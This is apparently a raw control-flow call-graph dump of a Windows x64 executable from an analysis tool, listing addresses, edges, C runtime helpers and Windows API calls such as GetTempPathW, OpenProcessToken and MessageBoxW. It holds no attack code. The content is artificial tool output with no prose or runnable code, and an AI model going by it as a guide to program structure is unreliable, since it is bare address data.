7ff6b75037b5 16589->16592 16591 7ff6b750378b 16591->16584 16597 7ff6b7502810 49 API calls 16591->16597 16592->16524 16599 7ff6b7501950 16592->16599 16594 7ff6b7503734 16913 7ff6b7502810 16594->16913 16595 7ff6b750374c __vcrt_InitializeCriticalSectionEx 16595->16587 16597->16584 16600 7ff6b75045c0 108 API calls 16599->16600 16601 7ff6b7501985 16600->16601 16602 7ff6b7501c43 16601->16602 16604 7ff6b7507f90 83 API calls 16601->16604 16603 7ff6b750c550 _log10_special 8 API calls 16602->16603 16605 7ff6b7501c5e 16603->16605 16606 7ff6b75019cb 16604->16606 16605->16400 16605->16401 16648 7ff6b7501a03 16606->16648 17285 7ff6b75106d4 16606->17285 16608 7ff6b751004c 74 API calls 16608->16602 16609 7ff6b75019e5 16610 7ff6b75019e9 16609->16610 16611 7ff6b7501a08 16609->16611 16613 7ff6b7514f08 _get_daylight 11 API calls 16610->16613 17289 7ff6b751039c 16611->17289 16614 7ff6b75019ee 16613->16614 17292 7ff6b7502910 16614->17292 16617 7ff6b7501a45 16622 7ff6b7501a5c 16617->16622 16623 7ff6b7501a7b 16617->16623 16618 7ff6b7501a26 16619 7ff6b7514f08 _get_daylight 11 API calls 16618->16619 16620 7ff6b7501a2b 16619->16620 16621 7ff6b7502910 54 API calls 16620->16621 16621->16648 16625 7ff6b7514f08 _get_daylight 11 API calls 16622->16625 16624 7ff6b7501c80 49 API calls 16623->16624 16627 7ff6b7501a92 16624->16627 16626 7ff6b7501a61 16625->16626 16628 7ff6b7502910 54 API calls 16626->16628 16629 7ff6b7501c80 49 API calls 16627->16629 16628->16648 16630 7ff6b7501add 16629->16630 16631 7ff6b75106d4 73 API calls 16630->16631 16632 7ff6b7501b01 16631->16632 16633 7ff6b7501b35 16632->16633 16634 7ff6b7501b16 16632->16634 16635 7ff6b751039c _fread_nolock 53 API calls 16633->16635 16636 7ff6b7514f08 _get_daylight 11 API calls 16634->16636 16637 7ff6b7501b4a 16635->16637 16638 7ff6b7501b1b 16636->16638 16639 7ff6b7501b50 16637->16639 16640 7ff6b7501b6f 16637->16640 16641 7ff6b7502910 54 API calls 16638->16641 16642 7ff6b7514f08 _get_daylight 11 API calls 16639->16642 17307 7ff6b7510110 
16640->17307 16641->16648 16644 7ff6b7501b55 16642->16644 16646 7ff6b7502910 54 API calls 16644->16646 16646->16648 16647 7ff6b7502710 54 API calls 16647->16648 16648->16608 16650 7ff6b750883a 16649->16650 16651 7ff6b7509390 2 API calls 16650->16651 16652 7ff6b7508859 GetEnvironmentVariableW 16651->16652 16653 7ff6b7508876 ExpandEnvironmentStringsW 16652->16653 16654 7ff6b75088c2 16652->16654 16653->16654 16655 7ff6b7508898 16653->16655 16656 7ff6b750c550 _log10_special 8 API calls 16654->16656 16658 7ff6b7509440 2 API calls 16655->16658 16657 7ff6b75088d4 16656->16657 16657->16410 16659 7ff6b75088aa 16658->16659 16660 7ff6b750c550 _log10_special 8 API calls 16659->16660 16661 7ff6b75088ba 16660->16661 16661->16410 16663 7ff6b75090f5 16662->16663 17525 7ff6b7508570 GetCurrentProcess OpenProcessToken 16663->17525 16666 7ff6b7508570 7 API calls 16667 7ff6b7509121 16666->16667 16668 7ff6b750913a 16667->16668 16669 7ff6b7509154 16667->16669 16670 7ff6b75026b0 48 API calls 16668->16670 16671 7ff6b75026b0 48 API calls 16669->16671 16672 7ff6b7509152 16670->16672 16673 7ff6b7509167 LocalFree LocalFree 16671->16673 16672->16673 16674 7ff6b7509183 16673->16674 16676 7ff6b750918f 16673->16676 17535 7ff6b7502b50 16674->17535 16677 7ff6b750c550 _log10_special 8 API calls 16676->16677 16678 7ff6b7503c55 16677->16678 16678->16455 16679 7ff6b7508660 16678->16679 16680 7ff6b7508678 16679->16680 16681 7ff6b75086fa GetTempPathW GetCurrentProcessId 16680->16681 16682 7ff6b750869c 16680->16682 17544 7ff6b75025c0 16681->17544 16684 7ff6b7508830 14 API calls 16682->16684 16685 7ff6b75086a8 16684->16685 17551 7ff6b75081d0 16685->17551 16692 7ff6b7508728 __std_exception_destroy 16698 7ff6b7508765 __std_exception_destroy 16692->16698 17548 7ff6b7518b68 16692->17548 16713 7ff6b75093b2 MultiByteToWideChar 16712->16713 16716 7ff6b75093d6 16712->16716 16714 7ff6b75093ec __std_exception_destroy 16713->16714 16713->16716 16714->16466 16715 7ff6b75093f3 MultiByteToWideChar 16715->16714 
16716->16714 16716->16715 16729 7ff6b75033ce __scrt_get_show_window_mode 16717->16729 16718 7ff6b750c550 _log10_special 8 API calls 16720 7ff6b7503664 16718->16720 16719 7ff6b75035c7 16719->16718 16720->16524 16736 7ff6b75090c0 LocalFree 16720->16736 16722 7ff6b7501c80 49 API calls 16722->16729 16723 7ff6b75035e2 16725 7ff6b7502710 54 API calls 16723->16725 16725->16719 16728 7ff6b75035c9 16731 7ff6b7502710 54 API calls 16728->16731 16729->16719 16729->16722 16729->16723 16729->16728 16730 7ff6b7502a50 54 API calls 16729->16730 16734 7ff6b75035d0 16729->16734 17740 7ff6b7504560 16729->17740 17746 7ff6b7507e20 16729->17746 17758 7ff6b7501600 16729->17758 17806 7ff6b7507120 16729->17806 17810 7ff6b7504190 16729->17810 17854 7ff6b7504450 16729->17854 16730->16729 16731->16719 16735 7ff6b7502710 54 API calls 16734->16735 16735->16719 16738 7ff6b7501ca5 16737->16738 16739 7ff6b7514984 49 API calls 16738->16739 16740 7ff6b7501cc8 16739->16740 16740->16405 16742 7ff6b7509390 2 API calls 16741->16742 16743 7ff6b75089b4 16742->16743 16744 7ff6b7518238 38 API calls 16743->16744 16745 7ff6b75089c6 __std_exception_destroy 16744->16745 16745->16418 16747 7ff6b75045cc 16746->16747 16748 7ff6b7509390 2 API calls 16747->16748 16749 7ff6b75045f4 16748->16749 16750 7ff6b7509390 2 API calls 16749->16750 16751 7ff6b7504607 16750->16751 18021 7ff6b7515f94 16751->18021 16754 7ff6b750c550 _log10_special 8 API calls 16755 7ff6b750392b 16754->16755 16755->16408 16756 7ff6b7507f90 16755->16756 16757 7ff6b7507fb4 16756->16757 16758 7ff6b75106d4 73 API calls 16757->16758 16759 7ff6b750808b __std_exception_destroy 16757->16759 16760 7ff6b7507fd0 16758->16760 16759->16412 16760->16759 18413 7ff6b75178c8 16760->18413 16762 7ff6b75106d4 73 API calls 16764 7ff6b7507fe5 16762->16764 16763 7ff6b751039c _fread_nolock 53 API calls 16763->16764 16764->16759 16764->16762 16764->16763 16766 7ff6b751007c 16765->16766 18428 7ff6b750fe28 16766->18428 16768 7ff6b7510095 16768->16408 16770 7ff6b750c850 
16769->16770 16771 7ff6b7502734 GetCurrentProcessId 16770->16771 16772 7ff6b7501c80 49 API calls 16771->16772 16773 7ff6b7502787 16772->16773 16774 7ff6b7514984 49 API calls 16773->16774 16775 7ff6b75027cf 16774->16775 16776 7ff6b7502620 12 API calls 16775->16776 16777 7ff6b75027f1 16776->16777 16778 7ff6b750c550 _log10_special 8 API calls 16777->16778 16779 7ff6b7502801 16778->16779 16779->16524 16781 7ff6b7509390 2 API calls 16780->16781 16782 7ff6b750895c 16781->16782 16783 7ff6b7509390 2 API calls 16782->16783 16784 7ff6b750896c 16783->16784 16785 7ff6b7518238 38 API calls 16784->16785 16786 7ff6b750897a __std_exception_destroy 16785->16786 16786->16422 16788 7ff6b7501c80 49 API calls 16787->16788 16789 7ff6b75044fd 16788->16789 16789->16449 16791 7ff6b7501c80 49 API calls 16790->16791 16792 7ff6b7504660 16791->16792 16792->16468 16794 7ff6b7506dd5 16793->16794 16795 7ff6b7503e6c 16794->16795 16796 7ff6b7514f08 _get_daylight 11 API calls 16794->16796 16799 7ff6b7507340 16795->16799 16797 7ff6b7506de2 16796->16797 16798 7ff6b7502910 54 API calls 16797->16798 16798->16795 18439 7ff6b7501470 16799->18439 18545 7ff6b7506360 16867->18545 16887 7ff6b751546c EnterCriticalSection 16880->16887 16889 7ff6b75036bc GetModuleFileNameW 16888->16889 16889->16580 16889->16581 16891 7ff6b75092bf FindClose 16890->16891 16892 7ff6b75092d2 16890->16892 16891->16892 16893 7ff6b750c550 _log10_special 8 API calls 16892->16893 16894 7ff6b750371a 16893->16894 16894->16586 16894->16587 16896 7ff6b750c850 16895->16896 16897 7ff6b7502c70 GetCurrentProcessId 16896->16897 16926 7ff6b75026b0 16897->16926 16899 7ff6b7502cb9 16930 7ff6b7514bd8 16899->16930 16902 7ff6b75026b0 48 API calls 16903 7ff6b7502d34 FormatMessageW 16902->16903 16905 7ff6b7502d7f MessageBoxW 16903->16905 16906 7ff6b7502d6d 16903->16906 16908 7ff6b750c550 _log10_special 8 API calls 16905->16908 16907 7ff6b75026b0 48 API calls 16906->16907 16907->16905 16909 7ff6b7502daf 16908->16909 16909->16584 16911 7ff6b7503730 
16910->16911 16912 7ff6b7509340 GetFinalPathNameByHandleW CloseHandle 16910->16912 16911->16594 16911->16595 16912->16911 16914 7ff6b7502834 16913->16914 16915 7ff6b75026b0 48 API calls 16914->16915 16916 7ff6b7502887 16915->16916 16917 7ff6b7514bd8 48 API calls 16916->16917 16918 7ff6b75028d0 MessageBoxW 16917->16918 16919 7ff6b750c550 _log10_special 8 API calls 16918->16919 16920 7ff6b7502900 16919->16920 16920->16584 16922 7ff6b750946a WideCharToMultiByte 16921->16922 16923 7ff6b7509495 16921->16923 16922->16923 16925 7ff6b75094ab __std_exception_destroy 16922->16925 16924 7ff6b75094b2 WideCharToMultiByte 16923->16924 16923->16925 16924->16925 16925->16591 16927 7ff6b75026d5 16926->16927 16928 7ff6b7514bd8 48 API calls 16927->16928 16929 7ff6b75026f8 16928->16929 16929->16899 16933 7ff6b7514c32 16930->16933 16931 7ff6b7514c57 16932 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16931->16932 16936 7ff6b7514c81 16932->16936 16933->16931 16934 7ff6b7514c93 16933->16934 16948 7ff6b7512f90 16934->16948 16938 7ff6b750c550 _log10_special 8 API calls 16936->16938 16937 7ff6b7514d74 16939 7ff6b751a948 __free_lconv_num 11 API calls 16937->16939 16940 7ff6b7502d04 16938->16940 16939->16936 16940->16902 16942 7ff6b7514d49 16944 7ff6b751a948 __free_lconv_num 11 API calls 16942->16944 16943 7ff6b7514d9a 16943->16937 16946 7ff6b7514da4 16943->16946 16944->16936 16945 7ff6b7514d40 16945->16937 16945->16942 16947 7ff6b751a948 __free_lconv_num 11 API calls 16946->16947 16947->16936 16949 7ff6b7512fce 16948->16949 16950 7ff6b7512fbe 16948->16950 16951 7ff6b7512fd7 16949->16951 16956 7ff6b7513005 16949->16956 16954 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16950->16954 16952 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16951->16952 16953 7ff6b7512ffd 16952->16953 16953->16937 16953->16942 16953->16943 16953->16945 16954->16953 16956->16950 16956->16953 16959 7ff6b75139a4 16956->16959 16992 7ff6b75133f0 16956->16992 17029 7ff6b7512b80 16956->17029 16960 
7ff6b75139e6 16959->16960 16961 7ff6b7513a57 16959->16961 16962 7ff6b75139ec 16960->16962 16963 7ff6b7513a81 16960->16963 16964 7ff6b7513a5c 16961->16964 16965 7ff6b7513ab0 16961->16965 16966 7ff6b7513a20 16962->16966 16967 7ff6b75139f1 16962->16967 17052 7ff6b7511d54 16963->17052 16968 7ff6b7513a5e 16964->16968 16969 7ff6b7513a91 16964->16969 16971 7ff6b7513ac7 16965->16971 16973 7ff6b7513aba 16965->16973 16978 7ff6b7513abf 16965->16978 16974 7ff6b75139f7 16966->16974 16966->16978 16967->16971 16967->16974 16972 7ff6b7513a00 16968->16972 16981 7ff6b7513a6d 16968->16981 17059 7ff6b7511944 16969->17059 17066 7ff6b75146ac 16971->17066 16990 7ff6b7513af0 16972->16990 17032 7ff6b7514158 16972->17032 16973->16963 16973->16978 16974->16972 16979 7ff6b7513a32 16974->16979 16987 7ff6b7513a1b 16974->16987 16978->16990 17070 7ff6b7512164 16978->17070 16979->16990 17042 7ff6b7514494 16979->17042 16981->16963 16983 7ff6b7513a72 16981->16983 16983->16990 17048 7ff6b7514558 16983->17048 16984 7ff6b750c550 _log10_special 8 API calls 16985 7ff6b7513dea 16984->16985 16985->16956 16987->16990 16991 7ff6b7513cdc 16987->16991 17077 7ff6b75147c0 16987->17077 16990->16984 16991->16990 17083 7ff6b751ea08 16991->17083 16993 7ff6b75133fe 16992->16993 16994 7ff6b7513414 16992->16994 16995 7ff6b7513454 16993->16995 16996 7ff6b75139e6 16993->16996 16997 7ff6b7513a57 16993->16997 16994->16995 16998 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16994->16998 16995->16956 16999 7ff6b75139ec 16996->16999 17000 7ff6b7513a81 16996->17000 17001 7ff6b7513a5c 16997->17001 17002 7ff6b7513ab0 16997->17002 16998->16995 17003 7ff6b7513a20 16999->17003 17004 7ff6b75139f1 16999->17004 17006 7ff6b7511d54 38 API calls 17000->17006 17005 7ff6b7513a91 17001->17005 17011 7ff6b7513a5e 17001->17011 17007 7ff6b7513ac7 17002->17007 17008 7ff6b7513aba 17002->17008 17010 7ff6b7513abf 17002->17010 17003->17010 17014 7ff6b75139f7 17003->17014 17004->17007 17004->17014 17012 7ff6b7511944 38 API calls 17005->17012 
17024 7ff6b7513a1b 17006->17024 17009 7ff6b75146ac 45 API calls 17007->17009 17008->17000 17008->17010 17009->17024 17016 7ff6b7512164 38 API calls 17010->17016 17027 7ff6b7513af0 17010->17027 17017 7ff6b7513a6d 17011->17017 17018 7ff6b7513a00 17011->17018 17012->17024 17013 7ff6b7514158 47 API calls 17013->17024 17015 7ff6b7513a32 17014->17015 17014->17018 17014->17024 17019 7ff6b7514494 46 API calls 17015->17019 17015->17027 17016->17024 17017->17000 17020 7ff6b7513a72 17017->17020 17018->17013 17018->17027 17019->17024 17022 7ff6b7514558 37 API calls 17020->17022 17020->17027 17021 7ff6b750c550 _log10_special 8 API calls 17023 7ff6b7513dea 17021->17023 17022->17024 17023->16956 17025 7ff6b75147c0 45 API calls 17024->17025 17024->17027 17028 7ff6b7513cdc 17024->17028 17025->17028 17026 7ff6b751ea08 46 API calls 17026->17028 17027->17021 17028->17026 17028->17027 17268 7ff6b7510fc8 17029->17268 17033 7ff6b751417e 17032->17033 17095 7ff6b7510b80 17033->17095 17038 7ff6b75142c3 17040 7ff6b75147c0 45 API calls 17038->17040 17041 7ff6b7514351 17038->17041 17039 7ff6b75147c0 45 API calls 17039->17038 17040->17041 17041->16987 17043 7ff6b75144c9 17042->17043 17044 7ff6b75144e7 17043->17044 17045 7ff6b751450e 17043->17045 17046 7ff6b75147c0 45 API calls 17043->17046 17047 7ff6b751ea08 46 API calls 17044->17047 17045->16987 17046->17044 17047->17045 17049 7ff6b7514579 17048->17049 17050 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17049->17050 17051 7ff6b75145aa 17049->17051 17050->17051 17051->16987 17053 7ff6b7511d87 17052->17053 17054 7ff6b7511db6 17053->17054 17056 7ff6b7511e73 17053->17056 17058 7ff6b7511df3 17054->17058 17238 7ff6b7510c28 17054->17238 17057 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17056->17057 17057->17058 17058->16987 17060 7ff6b7511977 17059->17060 17061 7ff6b75119a6 17060->17061 17063 7ff6b7511a63 17060->17063 17062 7ff6b7510c28 12 API calls 17061->17062 17065 7ff6b75119e3 17061->17065 17062->17065 17064 7ff6b751a814 
_invalid_parameter_noinfo 37 API calls 17063->17064 17064->17065 17065->16987 17067 7ff6b75146ef 17066->17067 17069 7ff6b75146f3 __crtLCMapStringW 17067->17069 17246 7ff6b7514748 17067->17246 17069->16987 17071 7ff6b7512197 17070->17071 17072 7ff6b75121c6 17071->17072 17074 7ff6b7512283 17071->17074 17073 7ff6b7510c28 12 API calls 17072->17073 17076 7ff6b7512203 17072->17076 17073->17076 17075 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17074->17075 17075->17076 17076->16987 17078 7ff6b75147d7 17077->17078 17250 7ff6b751d9b8 17078->17250 17084 7ff6b751ea39 17083->17084 17085 7ff6b751ea47 17083->17085 17084->17085 17086 7ff6b751ea67 17084->17086 17087 7ff6b75147c0 45 API calls 17084->17087 17085->16991 17088 7ff6b751ea78 17086->17088 17089 7ff6b751ea9f 17086->17089 17087->17086 17258 7ff6b75200a0 17088->17258 17089->17085 17091 7ff6b751eac9 17089->17091 17092 7ff6b751eb2a 17089->17092 17091->17085 17261 7ff6b751f8a0 17091->17261 17093 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 17092->17093 17093->17085 17096 7ff6b7510bb7 17095->17096 17102 7ff6b7510ba6 17095->17102 17096->17102 17125 7ff6b751d5fc 17096->17125 17099 7ff6b7510bf8 17100 7ff6b751a948 __free_lconv_num 11 API calls 17099->17100 17100->17102 17101 7ff6b751a948 __free_lconv_num 11 API calls 17101->17099 17103 7ff6b751e570 17102->17103 17104 7ff6b751e58d 17103->17104 17105 7ff6b751e5c0 17103->17105 17106 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17104->17106 17105->17104 17107 7ff6b751e5f2 17105->17107 17116 7ff6b75142a1 17106->17116 17111 7ff6b751e705 17107->17111 17120 7ff6b751e63a 17107->17120 17108 7ff6b751e7f7 17165 7ff6b751da5c 17108->17165 17110 7ff6b751e7bd 17158 7ff6b751ddf4 17110->17158 17111->17108 17111->17110 17113 7ff6b751e78c 17111->17113 17115 7ff6b751e74f 17111->17115 17118 7ff6b751e745 17111->17118 17151 7ff6b751e0d4 17113->17151 17141 7ff6b751e304 17115->17141 17116->17038 17116->17039 17118->17110 17119 7ff6b751e74a 17118->17119 17119->17113 17119->17115 17120->17116 
17132 7ff6b751a4a4 17120->17132 17123 7ff6b751a900 _isindst 17 API calls 17124 7ff6b751e854 17123->17124 17126 7ff6b751d647 17125->17126 17130 7ff6b751d60b _get_daylight 17125->17130 17127 7ff6b7514f08 _get_daylight 11 API calls 17126->17127 17129 7ff6b7510be4 17127->17129 17128 7ff6b751d62e HeapAlloc 17128->17129 17128->17130 17129->17099 17129->17101 17130->17126 17130->17128 17131 7ff6b7523590 _get_daylight 2 API calls 17130->17131 17131->17130 17133 7ff6b751a4bb 17132->17133 17134 7ff6b751a4b1 17132->17134 17135 7ff6b7514f08 _get_daylight 11 API calls 17133->17135 17134->17133 17139 7ff6b751a4d6 17134->17139 17136 7ff6b751a4c2 17135->17136 17137 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17136->17137 17138 7ff6b751a4ce 17137->17138 17138->17116 17138->17123 17139->17138 17140 7ff6b7514f08 _get_daylight 11 API calls 17139->17140 17140->17136 17174 7ff6b75240ac 17141->17174 17145 7ff6b751e3b0 17145->17116 17146 7ff6b751e401 17227 7ff6b751def0 17146->17227 17147 7ff6b751e3ac 17147->17145 17147->17146 17148 7ff6b751e3cc 17147->17148 17223 7ff6b751e1ac 17148->17223 17152 7ff6b75240ac 38 API calls 17151->17152 17153 7ff6b751e11e 17152->17153 17154 7ff6b7523af4 37 API calls 17153->17154 17155 7ff6b751e16e 17154->17155 17156 7ff6b751e172 17155->17156 17157 7ff6b751e1ac 45 API calls 17155->17157 17156->17116 17157->17156 17159 7ff6b75240ac 38 API calls 17158->17159 17160 7ff6b751de3f 17159->17160 17161 7ff6b7523af4 37 API calls 17160->17161 17162 7ff6b751de97 17161->17162 17163 7ff6b751de9b 17162->17163 17164 7ff6b751def0 45 API calls 17162->17164 17163->17116 17164->17163 17166 7ff6b751daa1 17165->17166 17167 7ff6b751dad4 17165->17167 17168 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17166->17168 17169 7ff6b751daec 17167->17169 17172 7ff6b751db6d 17167->17172 17171 7ff6b751dacd __scrt_get_show_window_mode 17168->17171 17170 7ff6b751ddf4 46 API calls 17169->17170 17170->17171 17171->17116 17172->17171 17173 7ff6b75147c0 45 API calls 17172->17173 
[Execution graph residue: Joe Sandbox control-flow graph for program.exe, exported as node identifiers, basic-block addresses (0x7ff6b750xxxx..0x7ff6b752xxxx) and edge pairs; the graph layout is not recoverable as text. Recoverable information: the nodes are dominated by MSVC CRT runtime internals (__std_exception_copy, _invalid_parameter_noinfo, _get_daylight, __free_lconv_num, _fread_nolock, __crtLCMapStringW, __FrameHandler3::FrameUnwindToEmptyState, __scrt_get_show_window_mode, memcpy_s, _isindst, _log10_special, fegetenv), and the Windows API calls reachable in the graph are GetTokenInformation, GetLastError, ConvertSidToStringSidW, CloseHandle, GetCurrentProcessId, MessageBoxA, MessageBoxW, EnterCriticalSection, FlsGetValue, FlsSetValue, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetACP, GetOEMCP, IsValidCodePage, GetCPInfo, LCMapStringW, MultiByteToWideChar and WideCharToMultiByte.]
20110 7ff6b751a948 __free_lconv_num 11 API calls 20106->20110 20114 7ff6b751ef68 20107->20114 20110->20098 20111 7ff6b7528f03 20111->20094 20113 7ff6b751a948 __free_lconv_num 11 API calls 20111->20113 20112 7ff6b751a948 __free_lconv_num 11 API calls 20112->20111 20113->20094 20115 7ff6b751ed10 __crtLCMapStringW 5 API calls 20114->20115 20116 7ff6b751efa6 20115->20116 20117 7ff6b751efae 20116->20117 20118 7ff6b751f1d0 __crtLCMapStringW 5 API calls 20116->20118 20117->20111 20117->20112 20119 7ff6b751f017 CompareStringW 20118->20119 20119->20117 20121 7ff6b7527c5a HeapSize 20120->20121 20122 7ff6b7527c41 20120->20122 20123 7ff6b7514f08 _get_daylight 11 API calls 20122->20123 20124 7ff6b7527c46 20123->20124 20125 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20124->20125 20126 7ff6b7527c51 20125->20126 20126->19785 20128 7ff6b7527c89 20127->20128 20129 7ff6b7527c93 20127->20129 20130 7ff6b751d5fc _fread_nolock 12 API calls 20128->20130 20131 7ff6b7527c98 20129->20131 20132 7ff6b7527c9f _get_daylight 20129->20132 20136 7ff6b7527c91 20130->20136 20133 7ff6b751a948 __free_lconv_num 11 API calls 20131->20133 20134 7ff6b7527cd2 HeapReAlloc 20132->20134 20135 7ff6b7527ca5 20132->20135 20138 7ff6b7523590 _get_daylight 2 API calls 20132->20138 20133->20136 20134->20132 20134->20136 20137 7ff6b7514f08 _get_daylight 11 API calls 20135->20137 20136->19789 20137->20136 20138->20132 20140 7ff6b751ed10 __crtLCMapStringW 5 API calls 20139->20140 20141 7ff6b751ef44 20140->20141 20141->19793 20143 7ff6b75154d6 20142->20143 20144 7ff6b75154fa 20142->20144 20148 7ff6b751a948 __free_lconv_num 11 API calls 20143->20148 20151 7ff6b75154e5 20143->20151 20145 7ff6b75154ff 20144->20145 20146 7ff6b7515554 20144->20146 20149 7ff6b7515514 20145->20149 20145->20151 20152 7ff6b751a948 __free_lconv_num 11 API calls 20145->20152 20147 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20146->20147 20158 7ff6b7515570 20147->20158 20148->20151 20153 7ff6b751d5fc _fread_nolock 12 API calls 
20149->20153 20150 7ff6b7515577 GetLastError 20154 7ff6b7514e7c _fread_nolock 11 API calls 20150->20154 20151->19797 20151->19798 20152->20149 20153->20151 20156 7ff6b7515584 20154->20156 20155 7ff6b75155b2 20155->20151 20159 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 20155->20159 20160 7ff6b7514f08 _get_daylight 11 API calls 20156->20160 20157 7ff6b75155a5 20162 7ff6b751d5fc _fread_nolock 12 API calls 20157->20162 20158->20150 20158->20155 20158->20157 20161 7ff6b751a948 __free_lconv_num 11 API calls 20158->20161 20163 7ff6b75155f6 20159->20163 20160->20151 20161->20157 20162->20155 20163->20150 20163->20151 20165 7ff6b7519221 20164->20165 20166 7ff6b7519225 20164->20166 20165->19826 20177 7ff6b75195cc 20165->20177 20185 7ff6b7522a3c GetEnvironmentStringsW 20166->20185 20169 7ff6b751923e 20192 7ff6b751938c 20169->20192 20170 7ff6b7519232 20172 7ff6b751a948 __free_lconv_num 11 API calls 20170->20172 20172->20165 20174 7ff6b751a948 __free_lconv_num 11 API calls 20175 7ff6b7519265 20174->20175 20176 7ff6b751a948 __free_lconv_num 11 API calls 20175->20176 20176->20165 20178 7ff6b75195ef 20177->20178 20183 7ff6b7519606 20177->20183 20178->19826 20179 7ff6b751eb98 _get_daylight 11 API calls 20179->20183 20180 7ff6b751967a 20182 7ff6b751a948 __free_lconv_num 11 API calls 20180->20182 20181 7ff6b751f8a0 MultiByteToWideChar _fread_nolock 20181->20183 20182->20178 20183->20178 20183->20179 20183->20180 20183->20181 20184 7ff6b751a948 __free_lconv_num 11 API calls 20183->20184 20184->20183 20186 7ff6b7522a60 20185->20186 20187 7ff6b751922a 20185->20187 20188 7ff6b751d5fc _fread_nolock 12 API calls 20186->20188 20187->20169 20187->20170 20191 7ff6b7522a97 memcpy_s 20188->20191 20189 7ff6b751a948 __free_lconv_num 11 API calls 20190 7ff6b7522ab7 FreeEnvironmentStringsW 20189->20190 20190->20187 20191->20189 20193 7ff6b75193b4 20192->20193 20194 7ff6b751eb98 _get_daylight 11 API calls 20193->20194 20205 7ff6b75193ef 20194->20205 20195 7ff6b75193f7 20196 7ff6b751a948 
__free_lconv_num 11 API calls 20195->20196 20197 7ff6b7519246 20196->20197 20197->20174 20198 7ff6b7519471 20199 7ff6b751a948 __free_lconv_num 11 API calls 20198->20199 20199->20197 20200 7ff6b751eb98 _get_daylight 11 API calls 20200->20205 20201 7ff6b7519460 20203 7ff6b75194a8 11 API calls 20201->20203 20202 7ff6b7520474 37 API calls 20202->20205 20204 7ff6b7519468 20203->20204 20207 7ff6b751a948 __free_lconv_num 11 API calls 20204->20207 20205->20195 20205->20198 20205->20200 20205->20201 20205->20202 20206 7ff6b7519494 20205->20206 20209 7ff6b751a948 __free_lconv_num 11 API calls 20205->20209 20208 7ff6b751a900 _isindst 17 API calls 20206->20208 20207->20195 20210 7ff6b75194a6 20208->20210 20209->20205 20213 7ff6b7528b31 __crtLCMapStringW 20211->20213 20212 7ff6b75270ee 20212->19852 20212->19853 20213->20212 20214 7ff6b751ef68 6 API calls 20213->20214 20214->20212 20370 7ff6b750cb50 20371 7ff6b750cb60 20370->20371 20387 7ff6b7519ba8 20371->20387 20373 7ff6b750cb6c 20393 7ff6b750ce48 20373->20393 20375 7ff6b750d12c 7 API calls 20377 7ff6b750cc05 20375->20377 20376 7ff6b750cb84 _RTC_Initialize 20385 7ff6b750cbd9 20376->20385 20398 7ff6b750cff8 20376->20398 20379 7ff6b750cb99 20401 7ff6b7519014 20379->20401 20385->20375 20386 7ff6b750cbf5 20385->20386 20388 7ff6b7519bb9 20387->20388 20389 7ff6b7519bc1 20388->20389 20390 7ff6b7514f08 _get_daylight 11 API calls 20388->20390 20389->20373 20391 7ff6b7519bd0 20390->20391 20392 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20391->20392 20392->20389 20394 7ff6b750ce59 20393->20394 20397 7ff6b750ce5e __scrt_release_startup_lock 20393->20397 20395 7ff6b750d12c 7 API calls 20394->20395 20394->20397 20396 7ff6b750ced2 20395->20396 20397->20376 20426 7ff6b750cfbc 20398->20426 20400 7ff6b750d001 20400->20379 20402 7ff6b7519034 20401->20402 20416 7ff6b750cba5 20401->20416 20403 7ff6b751903c 20402->20403 20404 7ff6b7519052 GetModuleFileNameW 20402->20404 20405 7ff6b7514f08 _get_daylight 11 API calls 20403->20405 20408 
7ff6b751907d 20404->20408 20406 7ff6b7519041 20405->20406 20407 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20406->20407 20407->20416 20409 7ff6b7518fb4 11 API calls 20408->20409 20410 7ff6b75190bd 20409->20410 20411 7ff6b75190c5 20410->20411 20415 7ff6b75190dd 20410->20415 20412 7ff6b7514f08 _get_daylight 11 API calls 20411->20412 20413 7ff6b75190ca 20412->20413 20414 7ff6b751a948 __free_lconv_num 11 API calls 20413->20414 20414->20416 20418 7ff6b751912b 20415->20418 20420 7ff6b7519144 20415->20420 20423 7ff6b75190ff 20415->20423 20416->20385 20425 7ff6b750d0cc InitializeSListHead 20416->20425 20417 7ff6b751a948 __free_lconv_num 11 API calls 20417->20416 20419 7ff6b751a948 __free_lconv_num 11 API calls 20418->20419 20422 7ff6b7519134 20419->20422 20420->20420 20421 7ff6b751a948 __free_lconv_num 11 API calls 20420->20421 20421->20423 20424 7ff6b751a948 __free_lconv_num 11 API calls 20422->20424 20423->20417 20424->20416 20427 7ff6b750cfd6 20426->20427 20429 7ff6b750cfcf 20426->20429 20430 7ff6b751a1ec 20427->20430 20429->20400 20433 7ff6b7519e28 20430->20433 20440 7ff6b75202d8 EnterCriticalSection 20433->20440 20441 7ff6b7519d50 20444 7ff6b7519ccc 20441->20444 20451 7ff6b75202d8 EnterCriticalSection 20444->20451 20621 7ff6b751afd0 20622 7ff6b751afea 20621->20622 20623 7ff6b751afd5 20621->20623 20627 7ff6b751aff0 20623->20627 20628 7ff6b751b03a 20627->20628 20629 7ff6b751b032 20627->20629 20631 7ff6b751a948 __free_lconv_num 11 API calls 20628->20631 20630 7ff6b751a948 __free_lconv_num 11 API calls 20629->20630 20630->20628 20632 7ff6b751b047 20631->20632 20633 7ff6b751a948 __free_lconv_num 11 API calls 20632->20633 20634 7ff6b751b054 20633->20634 20635 7ff6b751a948 __free_lconv_num 11 API calls 20634->20635 20636 7ff6b751b061 20635->20636 20637 7ff6b751a948 __free_lconv_num 11 API calls 20636->20637 20638 7ff6b751b06e 20637->20638 20639 7ff6b751a948 __free_lconv_num 11 API calls 20638->20639 20640 7ff6b751b07b 20639->20640 20641 7ff6b751a948 __free_lconv_num 
